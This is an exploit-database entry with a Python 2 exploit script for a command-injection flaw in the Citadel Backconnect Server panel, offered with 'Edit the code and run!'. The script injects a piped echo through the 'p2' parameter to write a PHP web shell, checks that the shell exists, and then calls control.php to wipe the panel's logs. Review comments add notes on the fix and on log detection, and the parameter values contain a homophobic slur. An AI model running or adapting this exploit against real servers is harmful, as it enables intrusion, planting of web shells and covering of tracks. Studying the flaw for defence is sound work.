Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability

2013-12-31T00:00:00
ID 1337DAY-ID-21720
Type zdt
Reporter Xylitol
Modified 2013-12-31T00:00:00

Description

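start "background_exec" cbcs.exe listen -cp:faggot -bp:hacker | echo "<?php phpinfo(); ?>" >> shell.php

This appears to be the command line the PHP gate ends up running once the request parameters are substituted in. The two values are placed after `-cp:` and `-bp:` without escaping, so the pipe and redirection carried in the second value are interpreted by the Windows command shell instead of being passed to cbcs.exe as an argument.

#### Usage Info

Edit the code and run!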

                                        
                                            import urllib
import urllib2

# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Works only on a Windows box

def request(url, params=None, method='GET'):
	"""Fire one HTTP request at `url` and throw the response away.

	POST sends `params` url-encoded as the request body.  GET appends
	`params` url-encoded as a query string, or requests `url` unchanged
	when `params` is None.  Any other `method` value does nothing.

	Nothing is returned.  No timeout is passed to urlopen, the response
	object is never closed, and network or HTTP errors raised by urllib2
	are left to propagate to the caller.
	"""
	if method == 'POST':
		body = urllib.urlencode(params)
		urllib2.urlopen(url, body).read()
		return
	if method != 'GET':
		# Unknown verbs are silently ignored.
		return
	if params == None:
		# Bare GET: the request is sent but the body is not read.
		urllib2.urlopen(url)
		return
	query = urllib.urlencode(params)
	urllib2.urlopen(url + '?' + query).read()

def uploadShell(url, filename, payload):
	"""Send the crafted request to the gate's test.php endpoint.

	Builds three parameters ('b', 'p1', 'p2') and passes them to request(),
	which defaults to GET, against url + 'test.php'.  The 'p2' value is a
	fixed prefix followed by a pipe, an echo of `payload` and a redirection
	into `filename`.  Returns nothing and never inspects the response.

	NOTE(review): the flaw being demonstrated is on the server side -- the
	'p2' value presumably reaches a command line unescaped (the gate script
	is not shown here, confirm against it).  The fix belongs there:
	validate or escape the parameter before building the command.
	Requests to test.php whose 'p2' carries shell metacharacters are the
	matching thing to search for in web-server access logs.
	"""
	data = {
		'b'  : 'tapz',
		'p1' : 'faggot',
		# Attacker-controlled text is concatenated straight into the value.
		'p2' : 'hacker | echo "' + payload + '" &gt;&gt; ' + filename
	}
	request(url + 'test.php', data)

def shellExists(url):
	"""Report whether fetching `url` answers with HTTP status 200.

	Only an exact 200 counts; every other status code yields False.  The
	response object is not closed and no timeout is set.
	"""
	status = urllib.urlopen(url).getcode()
	return status == 200
	
def cleanLogs(url):
	"""POST a single empty 'delete' field to the panel's control.php.

	Presumably this asks the panel to clear its own log; control.php is not
	shown here, so that is inferred from the function name and from the
	caller's status message.  Returns nothing.

	NOTE(review): the `url` argument is never used.  The request goes to
	the module-level URL constant instead.

	NOTE(review): for incident response, the panel's log is not the only
	record.  A web server with access logging enabled would normally still
	record this POST and the earlier request to test.php.
	"""
	delete = {
		'delete' : ''
	}
	# Reads the global URL, not the parameter.
	request(URL + 'control.php', delete, 'POST')

# Target settings.  The URL points at localhost, i.e. a local test install of
# the panel's winserv_php_gate directory.
URL      = 'http://localhost/citadel/winserv_php_gate/'
# Name of the file the injected command writes.  It is later requested
# relative to URL.
FILENAME = 'shell.php'
# Proof-of-concept content only: a phpinfo() call, stored here with its angle
# brackets as HTML entities.
PAYLOAD  = '&lt;?php phpinfo(); ?&gt;'

# Driver (Python 2 print statements): send the request, check for the file,
# then post the 'delete' request.
uploadShell(URL, FILENAME, PAYLOAD)
# NOTE(review): this message is printed before anything has been verified.
# The actual check is the shellExists() call below.
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
	print '[-]', FILENAME, 'not found...'
else:
	print '[+] Go to:', URL + FILENAME
# Runs unconditionally, whether or not the file was found, and its result is
# never checked before the final message.
cleanLogs(URL)
print '[~] Logs cleaned!'
